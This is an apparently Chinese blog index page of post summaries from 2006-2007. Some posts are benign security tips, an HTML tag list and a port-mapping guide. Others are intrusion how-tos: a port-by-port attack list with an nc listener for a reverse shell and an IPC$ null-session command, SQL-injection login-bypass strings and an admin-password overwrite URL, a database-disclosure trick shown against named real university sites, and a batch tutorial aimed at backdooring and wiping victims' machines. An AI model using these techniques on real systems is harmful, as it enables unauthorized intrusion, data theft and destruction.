博文

十大高招让你摆脱来自黑客的网络攻击(2007-01-21 23:36:00)

摘要:现在,使用ADSL的用户越来越多,由于ADSL用户在线时间长、速度快,因此成为黑客们的攻击目标。现在网上出现了各种越来越详细的“IP地址库”,要知道一些ADSL用户的IP是非常容易的事情。要怎么保卫自己的网络安全呢?不妨看看以下方法。

一、取消文件夹隐藏共享

如果你使用了Windows 2000/XP系统,右键单击C盘或者其他盘,选择共享,你会惊奇地发现它已经被设置为“共享该文件夹”,而在“网上邻居”中却看不到这些内容,这是怎么回事呢?

原来,在默认状态下,Windows 2000/XP会开启所有分区的隐藏共享,从“控制面板/管理工具/计算机管理”窗口下选择“系统工具/共享文件夹/共享”,就可以看到硬盘上的每个分区名后面都加了一个“$”。但是只要键入“计算机名或者IPC$”,系统就会询问用户名和密码,遗憾的是,大多数个人用户系统Administrator的密码都为空,入侵者可以轻易看到C盘的内容,这就给网络安全带来了极大的隐患。

怎么来消除默认共享呢?方法很简单,打开注册表编辑器,进入“HKEY_LOCAL_MACHINESYSTEM
CurrentControlSetSevicesLanmanworkstationparameters”,新建一个名为“AutoShareWKs”的双字节值,并将其值设为“0”,然后重新启动电脑,这样共享就取消了。

二、拒绝恶意代码

恶意网页成了宽带的最大威胁之一。以前使用Modem,因为打开网页的速度慢,在完全打开前关闭恶意网页还有避免中招的可能性。现在宽带的速度这么快,所以很容易就被恶意网页攻击。

一般恶意网页都是因为加入了用编写的恶意代码才有破坏力的。这些恶意代码就相当于一些小程序,只要打开该网页就会被运行。所以要避免恶意网页的攻击只要禁止这些恶意代码的运行就可以了。

运行IE浏览器,点击“工具/Internet选项/安全/自定义级别”,将安全级别定义为“安全级-高”,对“ActiveX控件和插件”中第2、3项设置为“禁用”,其它项设置为“提示”,之后点击“确定”。这样设置后,当你使用IE浏览网页时,就能有效避免恶意网页中恶意代码的攻击。

三、封死黑客的“后门”

俗......

阅读全文(4825) | 评论:1

QQ强制聊天(爱和谁聊就和谁聊)(2006-11-04 20:38:00)

摘要:   今天上网看到这个,绝对很不错,呵呵,就转过来了,希望对大家能有点帮助了~其实仔细看看代码就知道,只个是腾讯公司系统带的功能,只是腾讯公司没想到会有许多人拿来用做强制聊天,呵呵,不说了,赶快体验下吧~好的话,给顶一个哦~ QQ强制聊天代码,把代码中的红色的“********”星号换成你想与其聊天的QQ号即可。

  代码如下:http://wpa.qq.com/msgrd?V=1&Uin=********&Site=ioshenmue&Menu=yes

  使用方法:把代码中的红色的“********”星号换成你想与其聊天的QQ号后复制到浏览器的地址栏处即可。无论他是否你的好友,你无须加他为好友就能给他发QQ消息。

  注:强制可不好,不过用用也无妨。

......

阅读全文(6141) | 评论:12

黑客0起步 当黑客的第一步(2006-06-16 18:03:00)

摘要:个人整理出的一些文章。由于全是记事本形式写的。所以较小!
对菜鸟很有帮助


别一味的学盗号 刷QB之类的
那没意思,是无耻的行为
顺便送大家一句:
学技术先学做人


1,不要研究QQ,毕竟QQ不是技术,盗了几个号又算什么?程序不是自己编写的,没什么值得骄傲的.
2,不要研究怎么破解网吧,难道不觉得:一般关于破解网吧的帖子都很少人回复的么?
3,研究一些系统知识,比如windows什么版本和什么版本有什么区别……
4,研究组策略,研究注册表,研究CMD,研究ASP,研究PHP,研究JAVA……
5,经常来BBS闲逛,例如学盟...安全网等等
6,不要以为扫到**主机的**端口开放就可以利用什么,微软不是傻的!
7,尽量不要吧时间浪费在暴力破解上,因为机会很渺茫!无路可走时才可以用用。
8,不要认为黑客就是非法入侵,就是盗QQ,盗帐号。
9,祖国需要计算机人才,而不需要盗帐号的高手。
10,不要奢望有什么快速的途径学习技术,欲速则不达!没有丰富的经验是没有办法提高的。

如果说错什么,大家都可以指出来  ......

阅读全文(6480) | 评论:16

简明批处理教程 (2006-06-11 14:41:00)

摘要:前言

最近对于批处理技术的探讨比较热,也有不少好的批处理程序发布,但是如果没有一定的相关知识恐怕不容易看懂和理解这些批处理文件,也就更谈不上自己动手编写了,古语云:“授人以鱼,不如授人以渔。”因为网上好像并没有一个比较完整的教材,所以抽一点时间写了这片<<简明批处理教程>>给新手朋友们.也献给所有为实现网络的自由与共享而努力的朋友们.

批处理文件是无格式的文本文件,它包含一条或多条命令。它的文件扩展名为 .bat 或 .cmd。在命令提示下键入批处理文件的名称,或者双击该批处理文件,系统就会调用Cmd.exe按照该文件中各个命令出现的顺序来逐个运行它们。使用批处理文件(也被称为批处理程序或脚本),可以简化日常或重复性任务。当然我们的这个版本的主要内容是介绍批处理在入侵中一些实际运用,例如我们后面要提到的用批处理文件来给系统打补丁、批量植入后门程序等。下面就开始我们批处理学习之旅吧。

==================================================================================

==================================================================================

一.简单批处理内部命令简介

1.Echo 命令
打开回显或关闭请求回显功能,或显示消息。如果没有任何参数,echo 命令将显示当前回显设置。
语法
echo [{on|off}] [message]
Sample:@echo off / echo hello world
在实际应用中我们会把这条命令和重定向符号(也称为管道符号,一般用> >> ^)结合来实现输入一些命令到特定格式的文件中.这将在以后的例子中体现出来。

2.@ 命令
表示不显示@后面的命令,在入侵过程中(例如使用批处理来格式化敌人的硬盘)自然不能让对方看到你使用的命令啦。
Sample:@echo off
@echo Now initializing the program,please wait a mini......

阅读全文(4190) | 评论:1

HTML 语法大全(2006-06-11 14:38:00)

摘要:这里收集了 HTML 的所有语法〈当然并不是全部,但也差不多是这样了〉。希望对网友查询时比较方便。 注:按英文字母顺序排列
卷标 , 属性名称 简介

  <! - - ... - -> 批注

  <A HREF TARGET> 指定超级链接的分割窗口

  <A HREF=#锚的名称> 指定锚名称的超级链接

  <A HREF> 指定超级链接

  <A NAME=锚的名称> 被连结点的名称

  <ADDRESS>....</ADDRESS> 用来显示电子邮箱地址

  <B> 粗体字

  <BASE TARGET> 指定超级链接的分割窗口

  <BASEFONT SIZE> 更改预设字形大小

  <BGSOUND SRC> 加入背景音乐

  <BIG> 显示大字体

  <BLINK> 闪烁的文字

  <BODY TEXT LINK VLINK> 设定文字颜色

  <BODY> 显示本文

  <BR> 换行



  <CAPTION ALIGN> 设定表格标题位置

  <CAPTION>...</CAPTION> 为表格加上标题

  <CENTER> 向中对齐

  <CITE>...<CITE> 用于引经据典的文字

  <CODE>...</CODE> 用于列出一段程序代码

  <COMMENT>...</COMMENT> 加上批注



  <DD> 设定定义列表的项目解说

  <DFN>...</DFN> 显示"定义"文字
......

阅读全文(4253) | 评论:2

一个高级黑客给黑客同胞们的匿名信 (2006-05-24 20:07:00)

摘要:所有中国黑客和红客,我的同胞们:   首先声明,我的计算机软件技术、黑客功底,可能不会比你们任何人差:   我通读过 minix,tcp/ip,bsd,linux, pl1的源码,我拿过中国高级程序员证书,sun 的java证书,精通vc和unix,对缓冲区溢出,病毒,ddk等均有研究,所以我想我有资格对你们说几句话。   (如果我提到的一些计算机名词和人名,你们居然不知道,那只能证明你们的无知,和不配称为黑客。)   如果是真正的黑客,他会知道   1.发明tcp/ip的是美国人 。   2. linux的作者,linus大侠现在也在美国工作 。   3. open source的开创人 stallman 也是美国人,他提倡软件不分国界的自由的精神 。   4. free bsd 的作者是美国人,他的source 让真正的黑客受惠   5.世界级软件科学大师 tanabaom,也是美国的客座教授,他的minix, ameba和教材教育了全世界几代黑客。   提到这些,不是崇美,不是恐美,只想证明:   1.很多大师级的美国黑客,他们的理念恰恰是自由、开放、无国界;他们的自由软件,开放源码,是与政治无关的,是超越国界的,给全世界人们带来福音。   2.真正的黑客精神,如stallman所说,是要让人类超越计算机,成为计算机的主宰,从而成为自由的。   所有的中国黑客和红客,我的同胞们:   当你们正通过下载美国人写的黑客工具,来攻击美国网络,并且乐此不疲,以为这就是爱国行动的时候,是否想过:   此时此刻,印度的软件人士,正在努力提高软件技术,他们的软件水平、软件产业已经超越了中国;难道我们不应该痛苦地承认这个现实,并且奋起直追吗?   中国发明了火药,但是缺少研究精神,结果是被西方人研究改进了以后打中国,这样的教训还少吗?   中国向来不缺爱国热情,但是我们缺少对科技的认真研究精神,知耻而后勇的追赶精神。难道我们不愿意承认这一点吗?   从战术上来说,过早暴露自己的实力是不聪明的;冒昧地问一句,如果真的战争爆发了,您的黑客技术完全掌握好了吗,您已经为那一天的到来在进行技术储备吗?   您有没有想向那些真正为中国科技做出杰出贡献的科学家如钱学森学习呢?   所有的中国黑客和红客,我的同胞们:   请把你们的聪明才智用到真正提......

阅读全文(4447) | 评论:7

教你如何破解计算机中的所有密码!(2006-05-19 10:43:00)

摘要: 在日常的计算机**作中,我们随时随地都离不开密码——开机要使用CMOS密码、进Windows要使用用户密码、编辑Word文档要设置文档密码……,所有这些都为用户的数据安全提供了必要的安全保障!不过随着密码应用范围的增加,遗忘密码的情况也在与日俱增(谁也无法保证自己绝对不会忘记密码)!在忘记密码之后如何破解这些密码,尽可能减少损失就成为广大用户所关注的一个话题。为方便用户的使用,现将常用计算机密码的破解方法向大家作一简要介绍:   一、开机密码   根据用户设置的不同,开机密码一般分为两种不同情况,一种就是SETUP密码(采用此方式时,系统可直接启动,而仅仅只在进入BIOS设置时要求输入密码);另一种就是SYSTEM密码(采用此方式时,无论是直接启动还是进行BIOS设置都要求输入密码,没有密码将一事无成)。对于用户设置的这两种密码,我们的破解方法是有所区别的:   1、SETUP密码   如果计算机能正常引导,只是不能进入BIOS设置(即设置了SETUP密码),那么我们在遗忘密码之后只需在DOS状态下启动DEBUG,然后输入如下命令即可手工清除密码:   _ o 70 16
  _ o 71 16
  _ q   另外,不熟悉DEBUG的用户也可http://www.newhua.com/down/Cmospwd.zip 下载一个专门破解CMOS密码的工具软件Cmospwd。然后在DOS启动该程序,它就会将用户的CMOS密码显示出来(Cmospwd支持Acer、AMI、AWARD、COMPAQ、DELL、IBM、PACKARD BELL、PHOENIX、ZENITH AMI等多种BIOS),使用非常方便。   2、SYSTEM密码   若没有密码根本不能启动计算机(即设置了SYSTEM密码),那我们就无法通过软件来解决密码遗忘的问题了。此时唯一的方法就是打开机箱,给CMOS放电,清除CMOS中的所有内容(当然也就包括密码),然后重新开机进行设置。另外,有些主板设置了CMOS密码清除跳线,将该跳线短接也可达到同样的目的(详情参见主板说明书)。   二、Windows密码   1、Windows启动密码   遗忘Windows的启动密码虽然不会影响系统的启动,但它将导致用户无法进入自己的个人设置,因此破解Wi......

阅读全文(10274) | 评论:6

各种端口的入侵方法(2006-05-13 16:45:00)

摘要:1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPas*.**e 进行字典暴破(字典是关键) 最后 SQLTool*.**e入侵 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 (以上反向的,测试成功) sqlhelloz.exe 入侵ip 1433 (这个是正向连接) 2. 4899端口入侵 用4899过滤器.exe,扫描空口令的机器 3. 3899的入侵 对很早的机器,可以试试3389的溢出(win3389ex.exe) 对2000的机器,可以试试字典暴破。(tscrack.exe) 4. 80入侵 对sp3以前的机器,可以用webdav入侵; 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe) 可以利用SQL进行注入。(啊D的注入软件)。 5. serv-u入侵(21端口) 对5. 004及以下系统,可用溢出入侵。(serv5004.exe) 对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe) 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs) 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码 6. 554端口 用real554.exe入侵。 7. 6129端口 用DameWare6129.exe入侵。 8. 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 9. 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。 10. 其他入侵 利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。 经典IPC$入侵 1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"  这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连 接,因为密码为"空",所以......

阅读全文(3665) | 评论:0

端口映射(2006-05-13 16:43:00)

摘要:NAT是网络地址翻译就是把公网IP翻译成私有地址, 又叫端口映射或端口转发. 采用路由方式是指ADSL拥有一个动态或固定的公网IP,ADSL直接接在HUB或交换机上,所有的电脑共享上网。这时ADSL的外部地址只有一个,比如61.177.*.*。 而内部的IP是人为设置的,比如ADSL设为192.168.0.1,下面的电脑就依次设为192.168.0.*(*表示1,2,3,...)。  
    如何实现NAT功能呢?一般路由器中有个虚拟服务器的设置。针对邮件服务器要做如下设置:进入“虚拟服务器”,在端口填入 25, 协议中选择: TCP, IP地址:192.168.16.x(安装邮件服务器电脑的局域网IP地址),同样方法设置110(pop3),6080(webmail)端口
  另一种方法就是开放主机。开放主机(DMZ Host)是针对IP地址,取消防火墙的功能,将该局域网的IP地址直接映射到外部IP之上,采用开放主机(DMZ)的方式,不必管端口是多少。这种方式只支持一台内部电脑。
几款ADSL Modem的端口映射做法
以在内部pc 192.168.1.2 上架设 mail server 为例,mail server 的 SMTP 默认端口是25.
 阿尔卡特 SpeedTouch HomePlus511 中设置端口映射
 进入ADSL的Web设置页面, 在左边的菜单中点“Advanced”/"NAT"
 进入NAT的设置界面后,点右边的New创建新的端口映射
   Protocol选Tcp,Inside IP填192.168.1.2,Outside IP填0.0.0.0
   Inside Port和Outside IP都填成 25
 按Apply确认。
 设置的 25 端口映射就出现在NAPT Settings下方。
 点左上角的Save All保存设置,否则Modem的NAT会自动清空,还要再进行设置。
  阿尔卡特Speed Touch 515 设置端口映射
 先进入Modem的Web设置页面。 ......

阅读全文(3614) | 评论:0

学黑客必读,入侵的14种可利用方法(转)(2006-05-09 01:08:00)

摘要:上传漏洞[不多讲]
pS: 如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞了!
    有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.


2.注入漏洞[不多讲]
pS:对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令:
  http://注入网址;update admin set password=’新MD5密码’ where password=’旧MD5密码’--     [admin为表名.]


3.旁注,也就是跨站.
我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来入侵我们 要入侵的站点。,在这里有个难点,就是一些服务器的绝对路径经过加密,这就看我们的本事了
 


4.暴库:把二级目录中间的/换成%5c
EY:http://www.ahttc.edu.cn/otherweb ... s.asp?BigClassName=职责范围&BigClassType=1
如果你能看到:’E:\ahttc040901\otherweb\dz\database\iXuEr_Studio.asa’不是一个有效的路径。 确定路径名称拼写是否正确,以及是否 连接到文件存放的服务器。
这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行.
 

5.’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有:
’or’’=’ " or "a"="a   ’) or (’a’=’a   ") or ("a"="a   or 1=1--   ’ or ’a’=’a

6.社会工程学。这个我们都知道吧。就是猜解。
 EY:http://www.neu.edu.cn/waishi/admin
  &nbs......

阅读全文(4802) | 评论:4